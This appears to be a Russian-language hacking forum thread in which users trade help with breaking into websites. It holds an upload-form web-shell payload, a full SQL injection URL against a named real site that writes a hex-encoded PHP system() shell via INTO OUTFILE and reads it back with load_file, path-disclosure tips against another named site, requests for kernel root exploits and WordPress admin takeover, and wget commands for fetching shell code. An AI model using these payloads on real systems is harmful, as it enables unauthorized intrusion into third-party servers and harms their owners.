<form action="shell.php?lol=copy($_FILES[file][tmp_name], $_GET[bob]);&bob=./shell.php " method="post" enctype="multipart/form-data"> <input type="file" name="file"> <input type="submit" value="upload"> </form> В этом проекте и наш ettee участвовал
залил шелл и получил доступ к wordpress. Теперь как мне изменит пасс админа типа: $P$BVL7LPklZHMxVRnuBywE0fTV4d40SU. надо заменит на свой но не знаю чем кодироват свой пасс для вордпресса
disable_functions возможно ли выполнять системные команды, с такой конфигурацией php.ini? если да, то как?
Подскажите, может кто-то видел эксплоит на uname -a: Linux 2.6.27.12-170.2.5.fc10.i686 #1 SMP Wed Jan 21 02:09:37 EST 2009 i686
Сори,что тут пишу, вопрос в один ответ. подскажите плз файл-сервер с прямой ссылкой на закачаный мной файл.
давно хотел спросить... и вот наконец решился) вообщем ситуация такая.... сервак работает под рутом! залил с помощю into outfile в /tmp/freek8.php сстроку такого содержания--> <? php system($_GET[cmd]); ?> http://www.motorama.be/show.php?id=-117+union+select+1,2,0x3c3f207068702073797374656d28245f4745545b636d645d293b203f3e,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mysql.user+into+outfile+'/tmp/freek8.php'/* потом проверил записалось ли... http://www.motorama.be/show.php?id=-117+union+select+1,2,load_file('/tmp/freek8.php'),4,5,6,7,8,9,10,11,12,13,14,15,16,17/* но теперь то што дальше? я так понимаю надо раскрыть полный путь к файлу /tmp/freek8.php какие есть способы? вообщем подсказуйте хто што знает)
Что значит сервак работает под рутом? у веб сервера id=0? Сомневаюсь... Отсюда вопрос: а права web сервера пустят тебя в эту папку? Найди путь к сайту и залей шелл туда. Права у базы - рут,насколько я понял - это не рут системы...
это и есть полный путь к директории. Найди в скриптах сайта ошибку,которая выдаст путь к директории сайта,либо через тот же лоадфайл перебором, и лей шелл туда. Как от веб сервера обратиться к папке темп сам бы послушал,если такое возможно. Думаю функцией include,которую опять же нужно найти.
Он же расписал все по пунктам. 1. Юзаем тулзу от меднета http://madnet.name/tools/madss/, которая сканит сайт. 2. Видим там это, http://cacpe.be/index.php?page[]=, то есть раскрытие путей. 3. Льем шелл не в папку /tmp, а папку, которую показало нам раскрытие, и которая доступна из веба, то есть Code: Warning: Illegal offset type in isset or empty in [B][COLOR=Red]/var/www/html/index.php[/COLOR] [/B]on line 118 _______ А, ну да, madss показывает соседей + директории) _______ Либо у меня руки кривые, либо он через sock_sendpage() не рутается) _______ Да нет, все таки у меня руки кривые, ибо кто-то уже чмод 777 / -R выполнил)
Сразу видно ты команду ниразу не юзал: Code: wget http://ya.ru/index.html [COLOR=DarkOrange]-o[/COLOR] 1.txt - поместит лог работы в 1.txt wget http://ya.ru/index.html [COLOR=DarkOrange]-O[/COLOR] 1.txt - сохранит файл в 1.txt
правильно? wget http://site.ru/shell.txt -O http://www.motorama.be/shell.php где www.motorama.be/shell.php сайт куда надо загрузить шелл... а wget http://site.ru/shell.txt сайт где лежит код шелла...
неправильно. для того чтобы это было правильным, у программы wget должны были бы быть следующие возможности: - определяет что за веб-сервер установлен - ищет его конфиги - находит в конфигах полный путь к директории сервера - вычисляет куда, наконец, сохранить этот злополучный shell.php - сохраняет его туда Вам не кажется что это многовато для простой утилиты?